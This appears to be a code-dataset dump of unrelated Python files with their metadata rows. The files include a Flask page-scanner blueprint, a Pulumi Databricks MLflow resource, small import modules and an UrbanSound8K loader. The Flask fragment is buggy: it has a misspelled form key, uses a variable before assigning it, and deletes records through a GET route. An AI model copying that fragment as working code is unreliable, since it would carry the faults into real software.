malware= request.form['malware']
reputation= request.form['reputation']
popups= request.form['popups']
bruteforce= request.form['bruteforce']
title= request.form['title']
redirect= request.form['redirect']
sensitivedata= request.form['sensitivedata']
emailaddresses= request.form['emailaddresses']
adaissues= request.form['adaissues']
accesscontrol= request.form['accessontrol']
vulenrability= request.form['vulnerability']
scanned= request.form['scanned']
edited_page = Page(domain, user_id, last_mod, timestamp,
url,
xss,
sqli,
sql,
csrf,
hash,
uptime,
loadspeed,
pagecontent,
externallinks,
scripts,
base64,
documenttype,
virus,
malware,
reputation,
popups,
bruteforce,
title,
redirect,
sensitivedata,
emailaddresses,
adaissues,
accesscontrol,
vulenrability,
scanned, page_id)
edited_page.update_to_mongo()
return render_template('/pages/updated_page.html')
@page_blueprint.route('/admin/remove_page/<string:page_id>', methods=['GET'])
@user_decorators.requires_login #mike added
def remove_page(page_id):
page = page.remove_from_mongo_id(page_id)
#if request.method == 'GET':
return render_template('/pages/deleted_page.html')
#else:
#title = request.form['title']
#content = request.form['content']
#user = User.get_by_email(session['email'])
#new_post = Post(blog_id, title, content, user.email)
#new_post.save_to_mongo()
#return make_response(blog_posts(blog_id))
@page_blueprint.route('/page_details/<string:page_id>', methods=['GET'])
def show_page(page_id):
page = page.from_mongo_id(page_id)
#if request.method == 'GET':
return render_template('/pages/details.html', page_id=page_id, page= page)
#else:
# title = request.form['title']
# content = request.form['content']
# user = User.get_by_email(session['email'])
# new_post = Post(blog_id, title, content, user.email)
# new_post.save_to_mongo()
# return make_response(blog_posts(blog_id))'''
#@user_blueprint.route('/alerts')
#@user_decorators.requires_login
#def user_alerts():
# user = User.find_by_email(session['email'])
# return render_template("users/alerts.jinja2", alerts=user.get_alerts())
#@user_blueprint.route('/logout')
#def logout_user():
# session['email'] = None
# return redirect(url_for('home'))
#@user_blueprint.route('/check_alerts/<string:user_id>')
#@user_decorators.requires_login
#def check_user_alerts(user_id):
# pass
| 37.484581 | 114 | 0.57398 | 836 | 8,509 | 5.629187 | 0.120813 | 0.179983 | 0.043349 | 0.047811 | 0.868466 | 0.829154 | 0.791968 | 0.791968 | 0.763706 | 0.743731 | 0 | 0.002733 | 0.312023 | 8,509 | 226 | 115 | 37.650442 | 0.801162 | 0.128805 | 0 | 0.789157 | 0 | 0 | 0.14154 | 0.040266 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.042169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4d4f7310ec42e034f7c2711d7f85e4532ad11c7a | 147 | py | Python | 05/00/1.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | 05/00/1.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | 70 | 2017-06-01T11:02:51.000Z | 2017-06-30T00:35:32.000Z | 05/00/1.py | pylangstudy/201706 | f1cc6af6b18e5bd393cda27f5166067c4645d4d3 | [
"CC0-1.0"
] | null | null | null | basket = set()
print(basket)
basket.add('apple')
print(basket)
basket.add('apple')
print(basket)
basket.update({'orange', 'banana'})
print(basket)
| 16.333333 | 35 | 0.714286 | 20 | 147 | 5.25 | 0.4 | 0.419048 | 0.485714 | 0.380952 | 0.638095 | 0.638095 | 0.638095 | 0.638095 | 0 | 0 | 0 | 0 | 0.07483 | 147 | 8 | 36 | 18.375 | 0.772059 | 0 | 0 | 0.75 | 0 | 0 | 0.14966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
4d5a2af2892e2d2439220cb9c4325367a7ac8433 | 49 | py | Python | omnilearn/legacy/__init__.py | fleeb24/foundation | 18c4179cfe2988267827e532f8d8cd0726ef8709 | [
"MIT"
] | 1 | 2020-10-08T21:33:58.000Z | 2020-10-08T21:33:58.000Z | omnilearn/legacy/__init__.py | felixludos/foundation | 62ac096e6c53e12f2e29480506687c652c399d50 | [
"MIT"
] | null | null | null | omnilearn/legacy/__init__.py | felixludos/foundation | 62ac096e6c53e12f2e29480506687c652c399d50 | [
"MIT"
] | null | null | null |
from . import pointnets
# from . import adain
| 8.166667 | 23 | 0.693878 | 6 | 49 | 5.666667 | 0.666667 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244898 | 49 | 5 | 24 | 9.8 | 0.918919 | 0.387755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4d5f18a0fcc1951ee9291ae5c57d91fc3e53271a | 368 | py | Python | terrascript/resource/nsxt.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/resource/nsxt.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/resource/nsxt.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/resource/nsxt.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:22:57 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.nsxt
#
# instead of
#
# >>> import terrascript.resource.vmware.nsxt
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.vmware.nsxt import *
| 24.533333 | 73 | 0.736413 | 49 | 368 | 5.530612 | 0.714286 | 0.280443 | 0.169742 | 0.214022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037855 | 0.138587 | 368 | 14 | 74 | 26.285714 | 0.817035 | 0.80163 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4db2c7396027937a599261ea205cd3a1a60f48d2 | 131 | py | Python | src/csbuilder/pool/__init__.py | huykingsofm/csbuilder | c6ba6f0dd3fd2a0d03c7492de20a7107cb1b9191 | [
"MIT"
] | null | null | null | src/csbuilder/pool/__init__.py | huykingsofm/csbuilder | c6ba6f0dd3fd2a0d03c7492de20a7107cb1b9191 | [
"MIT"
] | null | null | null | src/csbuilder/pool/__init__.py | huykingsofm/csbuilder | c6ba6f0dd3fd2a0d03c7492de20a7107cb1b9191 | [
"MIT"
] | null | null | null | from csbuilder.pool.pool import Pool
from csbuilder.pool.func import protocols, states, roles, scheme, response, active_activation
| 43.666667 | 93 | 0.832061 | 18 | 131 | 6 | 0.666667 | 0.240741 | 0.314815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099237 | 131 | 2 | 94 | 65.5 | 0.915254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4dcdca587b5f6ae75d421b49a63456cf339127b9 | 149 | py | Python | vectorhub/encoders/text/tfhub/__init__.py | zeta1999/vectorhub | e9b23ac66bd170dd9d6639c3abffde3026d0935e | [
"Apache-2.0"
] | null | null | null | vectorhub/encoders/text/tfhub/__init__.py | zeta1999/vectorhub | e9b23ac66bd170dd9d6639c3abffde3026d0935e | [
"Apache-2.0"
] | null | null | null | vectorhub/encoders/text/tfhub/__init__.py | zeta1999/vectorhub | e9b23ac66bd170dd9d6639c3abffde3026d0935e | [
"Apache-2.0"
] | 1 | 2020-12-03T14:31:14.000Z | 2020-12-03T14:31:14.000Z | from .albert import *
from .bert import *
from .labse import *
from .use import *
from .use_multi import *
from .use_lite import *
from .use import * | 21.285714 | 24 | 0.724832 | 23 | 149 | 4.608696 | 0.347826 | 0.566038 | 0.490566 | 0.358491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181208 | 149 | 7 | 25 | 21.285714 | 0.868852 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
150e37056cb1b15a21ae8d3d4cef85e7b38b9414 | 611 | py | Python | temboo/core/Library/Facebook/Actions/Fitness/Walks/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/Facebook/Actions/Fitness/Walks/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/Facebook/Actions/Fitness/Walks/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.Facebook.Actions.Fitness.Walks.CreateWalk import CreateWalk, CreateWalkInputSet, CreateWalkResultSet, CreateWalkChoreographyExecution
from temboo.Library.Facebook.Actions.Fitness.Walks.DeleteWalk import DeleteWalk, DeleteWalkInputSet, DeleteWalkResultSet, DeleteWalkChoreographyExecution
from temboo.Library.Facebook.Actions.Fitness.Walks.ReadWalks import ReadWalks, ReadWalksInputSet, ReadWalksResultSet, ReadWalksChoreographyExecution
from temboo.Library.Facebook.Actions.Fitness.Walks.UpdateWalk import UpdateWalk, UpdateWalkInputSet, UpdateWalkResultSet, UpdateWalkChoreographyExecution
| 122.2 | 153 | 0.895254 | 52 | 611 | 10.519231 | 0.461538 | 0.073126 | 0.124314 | 0.182815 | 0.321755 | 0.321755 | 0.321755 | 0 | 0 | 0 | 0 | 0 | 0.045827 | 611 | 4 | 154 | 152.75 | 0.93825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
129f04396ff8eb058d45ac92c5b71bb41c1e3e6d | 20,459 | py | Python | sdk/python/pulumi_databricks/mlflow_experiment.py | pulumi/pulumi-databricks | 43580d4adbd04b72558f368ff0eef3d03432ebc1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_databricks/mlflow_experiment.py | pulumi/pulumi-databricks | 43580d4adbd04b72558f368ff0eef3d03432ebc1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_databricks/mlflow_experiment.py | pulumi/pulumi-databricks | 43580d4adbd04b72558f368ff0eef3d03432ebc1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['MlflowExperimentArgs', 'MlflowExperiment']
@pulumi.input_type
class MlflowExperimentArgs:
def __init__(__self__, *,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a MlflowExperiment resource.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
if artifact_location is not None:
pulumi.set(__self__, "artifact_location", artifact_location)
if creation_time is not None:
pulumi.set(__self__, "creation_time", creation_time)
if description is not None:
pulumi.set(__self__, "description", description)
if experiment_id is not None:
pulumi.set(__self__, "experiment_id", experiment_id)
if last_update_time is not None:
pulumi.set(__self__, "last_update_time", last_update_time)
if lifecycle_stage is not None:
pulumi.set(__self__, "lifecycle_stage", lifecycle_stage)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="artifactLocation")
def artifact_location(self) -> Optional[pulumi.Input[str]]:
"""
Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
"""
return pulumi.get(self, "artifact_location")
@artifact_location.setter
def artifact_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "artifact_location", value)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "creation_time")
@creation_time.setter
def creation_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "creation_time", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the MLflow experiment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="experimentId")
def experiment_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "experiment_id")
@experiment_id.setter
def experiment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "experiment_id", value)
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "last_update_time")
@last_update_time.setter
def last_update_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "last_update_time", value)
@property
@pulumi.getter(name="lifecycleStage")
def lifecycle_stage(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "lifecycle_stage")
@lifecycle_stage.setter
def lifecycle_stage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_stage", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _MlflowExperimentState:
def __init__(__self__, *,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MlflowExperiment resources.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
if artifact_location is not None:
pulumi.set(__self__, "artifact_location", artifact_location)
if creation_time is not None:
pulumi.set(__self__, "creation_time", creation_time)
if description is not None:
pulumi.set(__self__, "description", description)
if experiment_id is not None:
pulumi.set(__self__, "experiment_id", experiment_id)
if last_update_time is not None:
pulumi.set(__self__, "last_update_time", last_update_time)
if lifecycle_stage is not None:
pulumi.set(__self__, "lifecycle_stage", lifecycle_stage)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="artifactLocation")
def artifact_location(self) -> Optional[pulumi.Input[str]]:
"""
Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
"""
return pulumi.get(self, "artifact_location")
@artifact_location.setter
def artifact_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "artifact_location", value)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "creation_time")
@creation_time.setter
def creation_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "creation_time", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the MLflow experiment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="experimentId")
def experiment_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "experiment_id")
@experiment_id.setter
def experiment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "experiment_id", value)
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "last_update_time")
@last_update_time.setter
def last_update_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "last_update_time", value)
@property
@pulumi.getter(name="lifecycleStage")
def lifecycle_stage(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "lifecycle_stage")
@lifecycle_stage.setter
def lifecycle_stage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_stage", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
class MlflowExperiment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource allows you to manage [MLflow experiments](https://docs.databricks.com/data/data-sources/mlflow-experiment.html) in Databricks.
## Example Usage
```python
import pulumi
import pulumi_databricks as databricks
me = databricks.get_current_user()
this = databricks.MlflowExperiment("this",
artifact_location="dbfs:/tmp/my-experiment",
description="My MLflow experiment description")
```
## Access Control
* Permissions can control which groups or individual users can *Read*, *Edit*, or *Manage* individual experiments.
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
* Directory to manage directories in [Databricks Workpace](https://docs.databricks.com/workspace/workspace-objects.html).
* MlflowModel to create [MLflow models](https://docs.databricks.com/applications/mlflow/models.html) in Databricks.
* Notebook to manage [Databricks Notebooks](https://docs.databricks.com/notebooks/index.html).
* Notebook data to export a notebook from Databricks Workspace.
* Repo to manage [Databricks Repos](https://docs.databricks.com/repos.html).
## Import
The experiment resource can be imported using the id of the experiment bash
```sh
$ pulumi import databricks:index/mlflowExperiment:MlflowExperiment this <experiment-id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[MlflowExperimentArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource allows you to manage [MLflow experiments](https://docs.databricks.com/data/data-sources/mlflow-experiment.html) in Databricks.
## Example Usage
```python
import pulumi
import pulumi_databricks as databricks
me = databricks.get_current_user()
this = databricks.MlflowExperiment("this",
artifact_location="dbfs:/tmp/my-experiment",
description="My MLflow experiment description")
```
## Access Control
* Permissions can control which groups or individual users can *Read*, *Edit*, or *Manage* individual experiments.
## Related Resources
The following resources are often used in the same context:
* End to end workspace management guide.
* Directory to manage directories in [Databricks Workpace](https://docs.databricks.com/workspace/workspace-objects.html).
* MlflowModel to create [MLflow models](https://docs.databricks.com/applications/mlflow/models.html) in Databricks.
* Notebook to manage [Databricks Notebooks](https://docs.databricks.com/notebooks/index.html).
* Notebook data to export a notebook from Databricks Workspace.
* Repo to manage [Databricks Repos](https://docs.databricks.com/repos.html).
## Import
The experiment resource can be imported using the id of the experiment bash
```sh
$ pulumi import databricks:index/mlflowExperiment:MlflowExperiment this <experiment-id>
```
:param str resource_name: The name of the resource.
:param MlflowExperimentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MlflowExperimentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MlflowExperimentArgs.__new__(MlflowExperimentArgs)
__props__.__dict__["artifact_location"] = artifact_location
__props__.__dict__["creation_time"] = creation_time
__props__.__dict__["description"] = description
__props__.__dict__["experiment_id"] = experiment_id
__props__.__dict__["last_update_time"] = last_update_time
__props__.__dict__["lifecycle_stage"] = lifecycle_stage
__props__.__dict__["name"] = name
super(MlflowExperiment, __self__).__init__(
'databricks:index/mlflowExperiment:MlflowExperiment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
artifact_location: Optional[pulumi.Input[str]] = None,
creation_time: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
experiment_id: Optional[pulumi.Input[str]] = None,
last_update_time: Optional[pulumi.Input[int]] = None,
lifecycle_stage: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None) -> 'MlflowExperiment':
"""
Get an existing MlflowExperiment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] artifact_location: Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
:param pulumi.Input[str] description: The description of the MLflow experiment.
:param pulumi.Input[str] name: Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MlflowExperimentState.__new__(_MlflowExperimentState)
__props__.__dict__["artifact_location"] = artifact_location
__props__.__dict__["creation_time"] = creation_time
__props__.__dict__["description"] = description
__props__.__dict__["experiment_id"] = experiment_id
__props__.__dict__["last_update_time"] = last_update_time
__props__.__dict__["lifecycle_stage"] = lifecycle_stage
__props__.__dict__["name"] = name
return MlflowExperiment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="artifactLocation")
def artifact_location(self) -> pulumi.Output[Optional[str]]:
"""
Path to dbfs:/ or s3:// artifact location of the MLflow experiment.
"""
return pulumi.get(self, "artifact_location")
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> pulumi.Output[int]:
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the MLflow experiment.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="experimentId")
def experiment_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "experiment_id")
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> pulumi.Output[int]:
return pulumi.get(self, "last_update_time")
@property
@pulumi.getter(name="lifecycleStage")
def lifecycle_stage(self) -> pulumi.Output[str]:
return pulumi.get(self, "lifecycle_stage")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of MLflow experiment. It must be an absolute path within the Databricks workspace, e.g. `/Users/<some-username>/my-experiment`. For more information about changes to experiment naming conventions, see [mlflow docs](https://docs.databricks.com/applications/mlflow/experiments.html#experiment-migration).
"""
return pulumi.get(self, "name")
| 45.872197 | 346 | 0.667823 | 2,340 | 20,459 | 5.630769 | 0.090171 | 0.065953 | 0.090847 | 0.075137 | 0.873482 | 0.859897 | 0.85466 | 0.84578 | 0.835686 | 0.812917 | 0 | 0.000506 | 0.226502 | 20,459 | 445 | 347 | 45.975281 | 0.832101 | 0.343467 | 0 | 0.819231 | 1 | 0 | 0.100685 | 0.003983 | 0 | 0 | 0 | 0 | 0 | 1 | 0.161538 | false | 0.003846 | 0.019231 | 0.046154 | 0.276923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
12c1c3c4c1bd9ffb9fb6fcdb711200022d3be755 | 12,919 | py | Python | data/urbansound8k.py | hackerekcah/conv-hcpc | 1ac4a558e38bdba68162bfcc5cd8b2b7c8eea1b9 | [
"MIT"
] | null | null | null | data/urbansound8k.py | hackerekcah/conv-hcpc | 1ac4a558e38bdba68162bfcc5cd8b2b7c8eea1b9 | [
"MIT"
] | null | null | null | data/urbansound8k.py | hackerekcah/conv-hcpc | 1ac4a558e38bdba68162bfcc5cd8b2b7c8eea1b9 | [
"MIT"
] | null | null | null | import torch
import os
import logging
import glob
import soundfile as sf
import numpy as np
import resampy
import sys
import torchaudio
from data.data_transformer import Compose, FakePitchShift
from data import register_dataset
import math
from tqdm import tqdm
torchaudio.set_audio_backend("soundfile") # switch backend
logger = logging.getLogger(__name__)
@register_dataset
class UrbanSound8K(torch.utils.data.Dataset):
"""
sr is different file to file, most is 44100, 48000, 96000.
max 4 seconds audio, some less.
"""
def __init__(self, fold, split, target_sr=44100, transform=None):
super(UrbanSound8K, self).__init__()
if target_sr == 44100:
root = '/data/songhongwei/UrbanSound8K/audio44100/'
elif target_sr == 22050:
root = '/data/songhongwei/UrbanSound8K/audio22050/'
else:
root = '/data/songhongwei/UrbanSound8K/audio/'
logger.info("Loading data from {}".format(root))
if not os.path.exists(root):
raise Exception("{} does not exists.".format(root))
feat_files = glob.glob(os.path.join(root, "**/*.wav"), recursive=True)
